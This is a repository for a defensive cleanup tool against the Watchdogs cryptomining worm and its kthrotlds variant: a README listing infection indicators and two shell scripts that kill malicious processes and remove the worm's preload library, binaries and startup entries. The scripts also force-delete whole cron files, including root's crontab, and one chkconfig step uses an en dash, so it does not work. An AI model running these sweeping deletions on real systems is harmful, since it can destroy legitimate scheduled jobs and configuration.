├── README.md
├── busybox
├── clear.sh
└── clear_kthrotlds.sh


/README.md:
--------------------------------------------------------------------------------
 1 | # 清理工具使用说明
 2 | 
 3 | 本清理工具适用于2019年2月21日爆发的Watchdogs挖矿蠕虫。
 4 | - Watchdogs挖矿蠕虫主要特征如下：
 5 |    + ps -ef | grep watchdogs               # 存在恶意进程watchdogs
 6 |    + ps -ef | grep ksoftirqds              # 存在恶意进程ksoftirqds
 7 |    + chkconfig | grep watchdogs            # 存在恶意启动项watchdogs
 8 |    + ldd \`which ps\` | grep libioset.so     # ps、rm等命令被so劫持 
 9 |    + crontab -l | grep pastebin            # 存在恶意的蠕虫下载计划任务
10 |    
11 | - 使用clear清理Watchdogs步骤：
12 |    1. 上传busybox到/bin/目录下。
13 |    2. 运行clear.sh。
14 | 
15 | -------------------------------
16 | 
17 | # 2019.3.4 新增clear_kthrotlds.sh
18 | 
19 | 新增针对2019年3月1日Watchdogs进程变种为kthrotlds的挖矿蠕虫的清理脚本clear_kthrotlds.sh
20 | 
21 | - kthrotlds挖矿蠕虫变种主要特征如下：
22 |    + watchdogs进程变更为kthrotlds
23 |    + libioset.so变更为libcset.so
24 |    + watchdogs开机启动项名称变更为netdns
25 | 
26 | - 使用clear_kthrotlds.sh清理kthrotlds步骤：
27 |     1. 上传busybox到/bin/目录下。
28 |     2. 运行clear_kthrotlds.sh。
29 |     
30 | # 2019.6.8 补充说明
31 | 木马变种情况建议联系安全厂商介入(如：https://moresec.cn)：
32 | - 详细分析行为，修改脚本，根除木马。
33 | - 较难分析情况，重装系统，检查漏洞，修复漏洞，防止再感染。
34 | 
35 | By 默安科技（MoreSec）
36 | 


--------------------------------------------------------------------------------
/busybox:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MoreSecLab/DDG_MalWare_Clean_Tool/6ab1fc61e8b9e4259f4d4b493b7e4cd9e570687d/busybox


--------------------------------------------------------------------------------
/clear.sh:
--------------------------------------------------------------------------------
 1 | service crond stop
 2 | 
 3 | busybox rm -f /etc/ld.so.preload
 4 | busybox rm -f /usr/local/lib/libioset.so
 5 | chattr -i /etc/ld.so.preload
 6 | busybox rm -f /etc/ld.so.preload
 7 | busybox rm -f /usr/local/lib/libioset.so
 8 | 
 9 | # 清理异常进程
10 | busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
11 | busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '{print $1}' | busybox xargs kill -9
12 | 
13 | busybox rm -f /tmp/watchdogs
14 | busybox rm -f /etc/cron.d/tomcat
15 | busybox rm -f /etc/cron.d/root
16 | busybox rm -f /var/spool/cron/root
17 | busybox rm -f /var/spool/cron/crontabs/root
18 | busybox rm -f /etc/rc.d/init.d/watchdogs
19 | busybox rm -f /usr/sbin/watchdogs
20 | 
21 | ldconfig
22 | 
23 | # 再次清理异常进程
24 | busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
25 | busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '{print $1}' | busybox xargs kill -9
26 | 
27 | # 清理开机启动项
28 | chkconfig watchdogs off
29 | chkconfig –del watchdogs
30 | 
31 | service crond start
32 | echo "Done, Please reboot!"
33 | 
34 | 
35 | # 1eaf@moresec
36 | 


--------------------------------------------------------------------------------
/clear_kthrotlds.sh:
--------------------------------------------------------------------------------
 1 | service crond stop
 2 | 
 3 | busybox rm -f /etc/ld.so.preload
 4 | busybox rm -f /usr/local/lib/libcset.so
 5 | chattr -i /etc/ld.so.preload
 6 | busybox rm -f /etc/ld.so.preload
 7 | busybox rm -f /usr/local/lib/libcset.so
 8 | 
 9 | # 清理异常进程
10 | busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
11 | busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
12 | 
13 | busybox rm -f /tmp/kthrotlds
14 | busybox rm -f /etc/cron.d/tomcat
15 | busybox rm -f /etc/cron.d/root
16 | busybox rm -f /var/spool/cron/root
17 | busybox rm -f /var/spool/cron/crontabs/root
18 | busybox rm -f /etc/rc.d/init.d/kthrotlds
19 | busybox rm -f /usr/sbin/kthrotlds
20 | busybox rm -f /etc/init.d/netdns
21 | 
22 | 
23 | ldconfig
24 | 
25 | # 再次清理异常进程
26 | busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
27 | busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
28 | 
29 | # 清理开机启动项
30 | chkconfig netdns off
31 | chkconfig –del netdns
32 | 
33 | service crond start
34 | echo "Done, Please reboot!"
35 | 
36 | 
37 | # sidie@moresec
38 | 


--------------------------------------------------------------------------------